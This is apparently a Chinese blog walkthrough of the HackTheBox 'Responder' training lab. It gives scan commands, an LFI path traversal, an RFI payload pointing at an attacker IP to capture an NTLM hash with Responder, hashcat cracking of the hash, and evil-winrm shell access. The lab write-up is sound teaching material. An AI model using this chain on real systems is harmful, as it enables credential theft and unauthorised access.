HackTheBox_StartingPoint_Tier1_Responder

You need to walk before you can run
(目前为止完成时间最长的靶机,主要是扫描和爆破比较费时间)

TASK 1 How many TCP ports are open on the machine?

靶机中开放的TCP端口数量为:3

nmap -A -p1-65535 10.129.34.77

PS:这里由于校园网WAF的限制,所以7680端口无法直接扫描出来

在这里插入图片描述

TASK 2 When visiting the web service using the IP address, what is the domain that we are being redirected to?

当直接访问靶机IP时,被重定向到了:unika.htb

在这里插入图片描述

TASK 3 Which scripting language is being used on the server to generate webpages?

靶机网页使用的语言是:PHP

打开BP抓个包,即可得到答案

在这里插入图片描述

TASK 4 What is the name of the URL parameter which is used to load different language versions of the webpage?

用于加载不同语言的URL参数是:page

首先修改hosts文件禁止页面跳转,编辑/etc/hosts,添加IP地址和跳转地址,之后发现靶机IP可以正常访问

接着点修改语言(右上角EN),发现URL中的参数page
在这里插入图片描述在这里插入图片描述在这里插入图片描述

TASK 5 Which of the following values for the `page` parameter would be an example of exploiting a Local File Include (LFI) vulnerability: “french.html”, “//10.10.14.6/somefile”, “../../../../../../../../windows/system32/drivers/etc/hosts”, “minikatz.exe”

选择题,可以进行本地文件包含的是:../../../../../../../../windows/system32/drivers/etc/hosts

在这里插入图片描述

TASK 6 Which of the following values for the `page` parameter would be an example of exploiting a Remote File Include (RFI) vulnerability: “french.html”, “//10.10.14.6/somefile”, “../../../../../../../../windows/system32/drivers/etc/hosts”, “minikatz.exe”

同选择题,可以进行远程文件包含的是://10.10.14.6/somefile

TASK 7 What does NTLM stand for?

NTLM的全称是:New Technology LAN Manager

TASK 8 Which flag do we use in the Responder utility to specify the network interface?

responder中能指定网络接口的参数:-I(杠艾)

TASK 9 There are several tools that take a NetNTLMv2 challenge/response and try millions of passwords to see if any of them generate the same response. One such tool is often referred to as `john`, but the full name is what?.

john的全称是:john the ripper(用来爆破NTLM哈希的工具)

TASK 10 What is the password for the administrator user?

管理员账户的密码是:badminton

1、启动responder监听本地的tun0网卡:responder -I tun0
在这里插入图片描述

2、由于靶机存在远程文件包含漏洞,所以利用本机IP进行RFI:?page=//10.10.16.82/1.txt

在这里插入图片描述

3、成功RFI后查看responder,得到返回的哈希值
在这里插入图片描述

4、利用hashcat进行爆破,得到管理员密码:hashcat -m 5600 -a 3 responder.txt rockyou.txt

在这里插入图片描述

TASK 11 We’ll use a Windows service (i.e. running on the box) to remotely access the Responder machine using the password we recovered. What port TCP does it listen on?

使用我们恢复的密码远程访问 Responder的Windows 服务监听的端口是:5985

Submit root flag

利用evil-winrm直接getshell,在mike账户desktop下面找到flag

在这里插入图片描述

You will never know the mysteries!

支付宝
微信

扫一扫,分享到微信

微信分享二维码

tag:

    缺失模块。
    1、请确保node版本大于6.2
    2、在博客根目录(注意不是yilia根目录)执行以下命令:
    npm i hexo-generator-json-content --save

    3、在根目录_config.yml里添加配置: 

      jsonContent:
    meta: false
    pages: false
    posts:
      title: true
      date: true
      path: true
      text: false
      raw: false
      content: false
      slug: false
      updated: false
      comments: false
      link: false
      permalink: false
      excerpt: false
      categories: false
      tags: true

姓名:米古丽<br>生日:2000-03-03<br>队伍:仰望星空派<br>QQ:2916681908<br><br>一清主义至上者<br>I sense a mystery!